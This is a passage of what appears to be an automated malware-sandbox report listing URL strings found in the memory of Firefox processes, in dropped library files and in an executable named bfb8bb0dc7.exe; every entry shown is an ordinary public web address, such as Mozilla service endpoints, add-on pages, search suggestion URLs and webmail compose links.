Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: firefox.exe, 00000016.00000003.3066594596.000001893378B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 00000016.00000003.3066594596.000001893378B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: bfb8bb0dc7.exe, bfb8bb0dc7.exe, 0000000B.00000002.3127973139.000000006C6BD000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: firefox.exe, 00000016.00000003.2987924737.0000018935057000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3065632271.000001893551F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2986716743.0000018935C23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2988020236.00000189337DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3174842244.000001893551F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3061352644.000001893784F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3172655904.000001893784F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000016.00000003.2932981403.00000189378A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 00000016.00000003.2932981403.00000189378A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3061352644.000001893784F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulp
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3126655356.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: mozilla-temp-41.22.dr	String found in binary or memory: http://www.videolan.org/x264.html
Source: firefox.exe, 00000016.00000003.2840438082.000001893534A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2826493925.0000018935100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2835272663.0000018935329000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2831875013.0000018935307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: BGCAFHCA.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: bfb8bb0dc7.exe, 0000000B.00000002.3112755624.0000000022C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/p
Source: bfb8bb0dc7.exe, 0000000B.00000002.3112755624.0000000022C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/pnaclte?q=
Source: firefox.exe, 00000016.00000003.3028942370.000001893914C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2885095036.0000018937DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000016.00000003.3358984869.00000189445A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000016.00000003.3066184197.00000189337DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2988020236.00000189337DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000016.00000003.3401318781.000001894708A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000016.00000003.3401318781.000001894708A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000016.00000003.3401318781.000001894708A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000016.00000003.3401318781.000001894708A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000016.00000003.3401318781.000001894708A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 00000016.00000003.3253863845.0000018937281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 00000016.00000003.3253863845.0000018937281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 00000016.00000003.3253863845.0000018937281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
Source: firefox.exe, 00000016.00000003.3253863845.0000018937281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79fhttps://addons.
Source: firefox.exe, 00000016.00000003.3253863845.0000018937281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 00000016.00000003.2972414420.0000018935CFC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3243875790.0000018945932000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2878502064.00000189362A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2933839443.0000018935CDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000016.00000003.3234505370.000001894487D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000016.00000003.3364837586.00000189417D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/re
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A6B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2993742632.0000018932761000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.22.dr, JEHIJDGIEBKKFHJKJKEG.11.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A6B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2993742632.0000018932761000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.22.dr, JEHIJDGIEBKKFHJKJKEG.11.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: firefox.exe, 00000016.00000003.3056415593.00000189379A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3165953939.00000189379A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000016.00000003.3433524040.0000018947BCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1170143
Source: firefox.exe, 00000016.00000003.3433524040.0000018947BCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000016.00000003.3433524040.0000018947BCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=793869
Source: BGCAFHCA.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: bfb8bb0dc7.exe, 0000000B.00000002.3112755624.0000000022C00000.00000004.00000020.00020000.00000000.sdmp, BGCAFHCA.11.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: bfb8bb0dc7.exe, 0000000B.00000002.3112755624.0000000022C00000.00000004.00000020.00020000.00000000.sdmp, BGCAFHCA.11.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json.23.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: firefox.exe, 00000016.00000003.2840438082.000001893534A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2826493925.0000018935100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2835272663.0000018935329000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2831875013.0000018935307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000016.00000003.3356991599.00000189447DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A6B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2993742632.0000018932761000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.22.dr, JEHIJDGIEBKKFHJKJKEG.11.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A6B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2993742632.0000018932761000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.22.dr, JEHIJDGIEBKKFHJKJKEG.11.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000016.00000003.3357377046.0000018944721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000016.00000003.3357377046.0000018944721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000016.00000003.3231288925.0000018944623000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000016.00000003.2979236204.00000189388BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000016.00000003.2979236204.00000189388BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000016.00000003.2979236204.00000189388BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000016.00000003.2979236204.00000189388BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000016.00000003.3231288925.0000018944623000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: manifest.json.23.dr	String found in binary or memory: https://docs.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json.23.dr	String found in binary or memory: https://drive.google.com/
Source: firefox.exe, 00000016.00000003.3364719178.0000018941B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: BGCAFHCA.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BGCAFHCA.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BGCAFHCA.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000016.00000003.3066184197.000001893379A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000016.00000003.3066594596.000001893378B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000016.00000003.3066594596.000001893378B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000016.00000003.3066184197.000001893379A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000016.00000003.2979236204.00000189388BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000016.00000003.3245420946.00000189455C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3237228102.000001894493B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000016.00000003.3238318246.0000018944973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3238184718.0000018944981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3236687144.000001894496F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3237228102.000001894493B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000016.00000003.3245420946.00000189455C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3237228102.000001894493B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3247725111.0000018945FEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000016.00000003.3040417631.0000018937DC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2885385426.0000018937DC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3153426972.0000018937DC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2970817554.0000018937DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000016.00000003.3174093487.00000189375B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000016.00000003.3171769627.00000189378C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: firefox.exe, 00000016.00000003.2993742632.000001893277B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000016.00000003.3358984869.00000189445A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000016.00000003.3231288925.0000018944623000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000016.00000003.2826493925.0000018935100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2835272663.0000018935329000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2831875013.0000018935307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000016.00000003.3266839582.0000018946015000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3285813316.0000018945D76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3275100773.0000018946015000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3359286606.0000018944562000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3426789707.0000018945CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: JEHIJDGIEBKKFHJKJKEG.11.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3252846102.00000189372C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schemaInstance
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schemaInstance
Source: firefox.exe, 00000016.00000003.2937006777.000001893588E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000016.00000003.2937006777.000001893588E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000016.00000003.2937006777.000001893588E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2933435942.0000018936854000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2890975106.0000018936854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000016.00000003.2969179512.00000189387A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000016.00000003.2969179512.00000189387A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000016.00000003.3066184197.000001893379A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000016.00000003.3066184197.000001893379A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000016.00000003.3066594596.000001893378B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000016.00000003.3066184197.000001893379A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000016.00000003.3066594596.000001893378B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000016.00000003.3253256201.00000189372AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 00000016.00000003.2988324990.00000189337C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3066184197.00000189337AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
